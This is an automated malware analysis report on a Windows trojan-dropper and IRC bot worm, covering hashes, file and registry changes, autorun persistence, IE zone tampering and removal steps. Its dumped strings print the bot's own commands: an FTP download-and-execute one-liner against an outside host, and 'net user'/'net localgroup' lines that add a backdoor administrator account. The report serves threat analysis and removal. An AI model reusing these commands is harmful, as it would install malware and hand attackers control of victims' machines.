Trojan-Dropper.MSIL.Agent.cxt (Kaspersky), Trojan.Generic.3618876 (B) (Emsisoft), Trojan.Generic.3618876 (AdAware), GenericMSNWorm.YR, GenericAutorunWorm.YR, GenericIRCBot.YR, GenericProxy.YR, Blazebot.YR (Lavasoft MAS)Behaviour: Trojan-Dropper, Trojan, Worm, WormAutorun, IRCBot, MSNWorm, Trojan-Proxy
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 8bbcfbd5357d4b3610a753ffd53f8ab4
SHA1: e767f857945e3e2bfe8b49418d2406d8181c0fa8
SHA256: b2d104cf9b75d5d0dae1b7eb460b546d3298703df6562134ea286239ab885c58
SSDeep: 3072:FLA/0ICIu8vj YqioZGpgEVooN/guzh38ZAqqpnEquNoruDwegO6gJ/iCZU:hAsj8 NioZsz7/guhMwl7uNiwsO6US
Size: 218127 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2010-03-09 03:52:00
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
| IRCBot | A bot can communicate with command and control servers via IRC channel. |
| MSNWorm | A worm can spread its copies through the MSN Messanger. |
| Trojan-Proxy | This program can launch a proxy server (SOCKS4) on a designated TCP port. |
Process activity
The Trojan creates the following process(es):
CryptedFile.exe:492
usb_magr.exe:456
net1.exe:200
%original file name%.exe:1736
net.exe:1148
The Trojan injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process CryptedFile.exe:492 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\usb_magr.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\x.bat (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MLU3OVE7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3YUZGLT3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZER4307\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GTW3S5W5\desktop.ini (67 bytes)
The process usb_magr.exe:456 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\x.bat (53 bytes)
The process %original file name%.exe:1736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CryptedFile.exe (9476 bytes)
Registry activity
The process CryptedFile.exe:492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:]
"X.bat" = "x"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 2D C6 02 6D C3 74 BD 79 EB E1 9C 4E BA D2 EE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Universal Serial Bus device" = "usb_magr.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process usb_magr.exe:456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 60 3D 92 1B 64 21 05 FC D7 07 1A BB 6D 18 D9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process net1.exe:200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 FC E9 D7 33 F4 E6 BA 0D EF FC 1E A3 F3 71 9C"
The process %original file name%.exe:1736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D B3 9A E3 5A 1A 80 E5 88 88 80 64 33 DC D4 58"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"CryptedFile.exe" = "CryptedFile"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process net.exe:1148 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C E8 BD 94 CB E0 87 D2 85 16 54 A3 C7 3E 47 E7"
Dropped PE files
| MD5 | File path |
|---|---|
| 32c55400e485741be10958155b133741 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\CryptedFile.exe |
| 32c55400e485741be10958155b133741 | c:\WINDOWS\usb_magr.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.A worm can spread its copies through the MSN Messanger.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
CryptedFile.exe:492
usb_magr.exe:456
net1.exe:200
%original file name%.exe:1736
net.exe:1148 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\usb_magr.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\x.bat (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MLU3OVE7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3YUZGLT3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZER4307\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GTW3S5W5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CryptedFile.exe (9476 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Universal Serial Bus device" = "usb_magr.exe" - Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
Static Analysis
VersionInfo
Company Name: Trend Micro Inc
Product Name: Hijack This
Product Version: 2.00.00.2
Legal Copyright: (c) 2007 Trend Micro Inc
Legal Trademarks:
Original Filename: cStub.exe
Internal Name: cStub.exe
File Version: 2.00.00.2
File Description: Hijack This
Comments: Hijack This
Language: Language Neutral
Company Name: Trend Micro IncProduct Name: Hijack ThisProduct Version: 2.00.00.2Legal Copyright: (c) 2007 Trend Micro IncLegal Trademarks: Original Filename: cStub.exeInternal Name: cStub.exeFile Version: 2.00.00.2File Description: Hijack ThisComments: Hijack ThisLanguage: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .rsrc | 8192 | 2744 | 3072 | 2.60384 | c82deb9661166fdd3eadf72a6440e109 |
| .text | 16384 | 140264 | 140288 | 4.46888 | 7719333339f2a11d69fe1c32ec5a8256 |
| .reloc | 163840 | 12 | 512 | 0.084755 | 6b1ae5a573ab4e89060f7fc64399d950 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
da7509568fa113a64b5ed483a4a0b72f
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
usb_magr.exe_456:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@}.hP
@}.hP
x.down
x.down
TransactNamedPipe
TransactNamedPipe
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
WS2_32.dll
WS2_32.dll
Exploit FTPD: %d, Total: %d.
Exploit FTPD: %d, Total: %d.
%s: %d,
%s: %d,
%s Exploit Statistics:
%s Exploit Statistics:
cmd /c echo open v1.virtual-rejectz.com 4356 > i&echo user ik ik >> i &echo binary >> i &echo get indi.exe >> i &echo quit >> i &ftp -n -s:i &indi.exe
cmd /c echo open v1.virtual-rejectz.com 4356 > i&echo user ik ik >> i &echo binary >> i &echo get indi.exe >> i &echo quit >> i &ftp -n -s:i &indi.exe
%s.%s.%s.%s
%s.%s.%s.%s
%s Scan not active.
%s Scan not active.
%s Current IP: %s.
%s Current IP: %s.
%s Server started, Port: %i, File: %s.
%s Server started, Port: %i, File: %s.
%d.%d.%d.%d
%d.%d.%d.%d
%s Finished at %s:%d after %d minute(s) of scanning.
%s Finished at %s:%d after %d minute(s) of scanning.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s Failed to initialize critical section, error: <%d>
%s Failed to initialize critical section, error: <%d>
%s Portscan: %s:%d open.
%s Portscan: %s:%d open.
Failed auth by %s(%s@%s)
Failed auth by %s(%s@%s)
Whats up %s? Im ready to rock!
Whats up %s? Im ready to rock!
Spy: %s!%s@%s (PM: "%s")
Spy: %s!%s@%s (PM: "%s")
Fail by: %s!%s@%s (Pass Tried: %s)
Fail by: %s!%s@%s (Pass Tried: %s)
%s out.
%s out.
%s already running: <%d>.
%s already running: <%d>.
Failed to start thread %s, error: <%d>.
Failed to start thread %s, error: <%d>.
[Current task] %s [System uptime] %s [Bot Uptime] %s
[Current task] %s [System uptime] %s [Bot Uptime] %s
Bot installed on: %s.
Bot installed on: %s.
Go fuck yourself %s.
Go fuck yourself %s.
MSN// Message & Zipfile sent to: %d contacts.
MSN// Message & Zipfile sent to: %d contacts.
I tried to fool %d morons.
I tried to fool %d morons.
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
Removed by: %s!%s@%s
Removed by: %s!%s@%s
Advapi.dll Failed
Advapi.dll Failed
%s Failed to parse command.
%s Failed to parse command.
Updating from %s (%s)
Updating from %s (%s)
%stempfile%d%d%d%d%d.exe
%stempfile%d%d%d%d%d.exe
%s Failed to start scan thread, error: <%d>.
%s Failed to start scan thread, error: <%d>.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s Failed to start scan, no IP specified.
%s Failed to start scan, no IP specified.
%s Could not parse external IP.
%s Could not parse external IP.
%s Trying to get external IP.
%s Trying to get external IP.
%s No subnet class specified, try "-a" or "-b" or "-c"
%s No subnet class specified, try "-a" or "-b" or "-c"
%d.x.x.x
%d.x.x.x
%s Failed to start scan, port is invalid.
%s Failed to start scan, port is invalid.
%s Already scanning with %d threads. Too many specified.
%s Already scanning with %d threads. Too many specified.
ftp://%s:%s@%s:%s/%s path: %s
ftp://%s:%s@%s:%s/%s path: %s
sftp
sftp
net localgroup Administrateurs ASP.NET /add
net localgroup Administrateurs ASP.NET /add
net localgroup Administradors ASP.NET /add
net localgroup Administradors ASP.NET /add
net localgroup Administratoren ASP.NET /add
net localgroup Administratoren ASP.NET /add
net localgroup Administrator ASP.NET /add
net localgroup Administrator ASP.NET /add
net localgroup Administrators ASP.NET /add
net localgroup Administrators ASP.NET /add
net user ASP.NET hardcore /add
net user ASP.NET hardcore /add
SYN: Failed to start thread,error: (%d).
SYN: Failed to start thread,error: (%d).
SYN: --> (%s:%s) for (%s secs).
SYN: --> (%s:%s) for (%s secs).
FUCKING: --> (%s:%s) for (%s secs).
FUCKING: --> (%s:%s) for (%s secs).
Downloading %s and saving it to: %s.
Downloading %s and saving it to: %s.
Failed to start socks4 daemon (%s)
Failed to start socks4 daemon (%s)
Socks(4) server started on %s:%i
Socks(4) server started on %s:%i
Process Finished: "%s", Total Running Time: %s.
Process Finished: "%s", Total Running Time: %s.
File executed: %s
File executed: %s
Unable to create process: "%s"
Unable to create process: "%s"
%s Couldn't parse path, error: <%d>
%s Couldn't parse path, error: <%d>
%.1fkb downloaded to %s (%.1fkbps)
%.1fkb downloaded to %s (%.1fkbps)
Couldn't open file for writing: %s.
Couldn't open file for writing: %s.
Windows for Workgroups 3.1a
Windows for Workgroups 3.1a
WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195
WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195
Windows 2000 5.0
Windows 2000 5.0
Windows 2000 2195
Windows 2000 2195
pipe\epmapper
pipe\epmapper
\\%s\
\\%s\
Windows 5.1
Windows 5.1
Windows 5.0
Windows 5.0
Windows 2000 LAN Manager*
Windows 2000 LAN Manager*
NT LAN Manager *.*
NT LAN Manager *.*
Windows Server 2003 *.*
Windows Server 2003 *.*
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s.
%s Started send to IP: %s.
%s Started send to IP: %s.
200 PORT command successful.
200 PORT command successful.
PORT
PORT
%s %s LIST request from: %s
%s %s LIST request from: %s
425 Passive not supported on this server
425 Passive not supported on this server
215 StnyFtpd
215 StnyFtpd
331 Password required
331 Password required
%s %s
%s %s
%s Couldn't open data connection to: %s:%i, error: <%d>.
%s Couldn't open data connection to: %s:%i, error: <%d>.
Ping Timeout? (%d-%d)%d/%d
Ping Timeout? (%d-%d)%d/%d
Login list completed!
Login list completed!
<%i> %s!%s@%s
<%i> %s!%s@%s
Logins:
Logins:
USER MEAT * 0 :%s
USER MEAT * 0 :%s
NICK %s
NICK %s
{%s-%s-%s-%s-%s}
{%s-%s-%s-%s-%s}
{iNF-%s-%s-%s-%s-%s}
{iNF-%s-%s-%s-%s-%s}
nigzss.txt
nigzss.txt
TskMultiChatForm.UnicodeClass
TskMultiChatForm.UnicodeClass
__oxFrame.class__
__oxFrame.class__
PASS %s
PASS %s
QUIT %s
QUIT %s
PONG %s
PONG %s
NICK
NICK
PRIVMSG
PRIVMSG
JOIN
JOIN
NOTICE %s :%s
NOTICE %s :%s
PRIVMSG %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
[%s|%s]
[%s|%s]
shlwapi.dll
shlwapi.dll
psapi.dll
psapi.dll
userenv.dll
userenv.dll
SQLDisconnect
SQLDisconnect
SQLFreeHandle
SQLFreeHandle
SQLAllocHandle
SQLAllocHandle
SQLExecDirect
SQLExecDirect
SQLSetEnvAttr
SQLSetEnvAttr
SQLDriverConnect
SQLDriverConnect
odbc32.dll
odbc32.dll
ShellExecuteA
ShellExecuteA
shell32.dll
shell32.dll
mpr.dll
mpr.dll
GetUdpTable
GetUdpTable
GetTcpTable
GetTcpTable
iphlpapi.dll
iphlpapi.dll
dnsapi.dll
dnsapi.dll
netapi32.dll
netapi32.dll
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetCrackUrlA
InternetOpenUrlA
InternetOpenUrlA
FtpPutFileA
FtpPutFileA
FtpGetFileA
FtpGetFileA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
wininet.dll
wininet.dll
ws2_32.dll
ws2_32.dll
RegEnumKeyExA
RegEnumKeyExA
advapi32.dll
advapi32.dll
user32.dll
user32.dll
kernel32.dll
kernel32.dll
%s!%s@%s
%s!%s@%s
NICK {%s-%s-%s-%s-%s}
NICK {%s-%s-%s-%s-%s}
usb_magr.exe
usb_magr.exe
EFTP//
EFTP//
v1.virtual-rejectz.com
v1.virtual-rejectz.com
indi.exe
indi.exe
ftpd.exe
ftpd.exe
here.virtual-rejectz.com
here.virtual-rejectz.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
%s\%s
del c:\x.bat
del c:\x.bat
c:\x.bat
c:\x.bat
%s Done @ (%iKB Sec)
%s Done @ (%iKB Sec)
No %s thread found.
No %s thread found.
%s thread stopped.
%s thread stopped.
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\Desktop.ini
\autorun.inf
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
icon=%SystemRoot%\system32\SHELL32.dll,4
http://www.whatismyip.com
http://www.whatismyip.com
http://checkip.dyndns.org
http://checkip.dyndns.org
del "%s">nul
del "%s">nul
if exist "%s" goto Repeat
if exist "%s" goto Repeat
ping 0.0.0.0>nul
ping 0.0.0.0>nul
%s\removeMe%i%i%i%i.bat
%s\removeMe%i%i%i%i.bat
%s%%s
%s%%s
%d day%s (%0.2d hours & %0.2d mins)
%d day%s (%0.2d hours & %0.2d mins)
192.168.11.130
192.168.11.130